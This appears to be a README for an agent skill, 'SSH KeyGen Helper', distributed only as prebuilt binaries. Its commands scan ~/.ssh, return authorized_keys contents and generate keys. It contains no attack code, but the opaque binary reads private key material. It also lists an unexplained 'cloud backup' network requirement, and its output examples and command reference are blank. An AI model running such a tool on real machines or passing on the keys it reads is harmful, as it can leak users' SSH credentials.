# SSH KeyGen Helper v1.0.0

A developer-friendly tool for SSH key management and configuration.

## Usage

The skill is distributed as a standalone binary. No Python installation required.

### macOS (arm64)

```bash
./ssh-keygen-helper-1.0.0_mac <command> [args...]
```

### Linux (aarch64)

```bash
./ssh-keygen-helper-1.0.0_linux <command> [args...]
```

## Available Commands

### `analyze_ssh_config`

Analyze SSH configuration and return comprehensive analysis including:
- SSH keys found in ~/.ssh directory
- Security analysis and recommendations
- Configuration status

**Usage:**
```bash
./ssh-keygen-helper-1.0.0_mac analyze_ssh_config
```

**Output Example:**

### `check_authorized_keys`

Check and return the content of ~/.ssh/authorized_keys file.

**Usage:**
```bash
./ssh-keygen-helper-1.0.0_mac check_authorized_keys
```

**Output:**
- Returns the content of authorized_keys file
- Returns `{"error": "No authorized_keys found"}` if file doesn't exist

### `generate_key`

Generate a new SSH key with best practices.

**Usage:**
```bash
./ssh-keygen-helper-1.0.0_mac generate_key [key_type] [comment]
```

**Arguments:**
- `key_type` (optional): Key type, default is `ed25519`. Supported: `ed25519`, `rsa`, `ecdsa`
- `comment` (optional): Comment for the key (e.g., email address)

**Example:**
```bash
# Generate Ed25519 key (recommended)
./ssh-keygen-helper-1.0.0_mac generate_key

# Generate RSA key with comment
./ssh-keygen-helper-1.0.0_mac generate_key rsa "user@example.com"
```

**Output Example:**

## Command Reference

## How It Works

1. **Directory Scan**: Scans ~/.ssh directory for all keys and configs
2. **Key Analysis**: Analyzes key types, permissions, and security
3. **Config Reading**: Reads and parses SSH config files
4. **Key Generation**: Uses OpenSSH's ssh-keygen for secure key generation

## Prerequisites

- OpenSSH client installed (for ssh-keygen command)
- Read/Write access to ~/.ssh directory
- Network access for cloud backup (optional)

**Note**: Python is NOT required - the binary is self-contained.
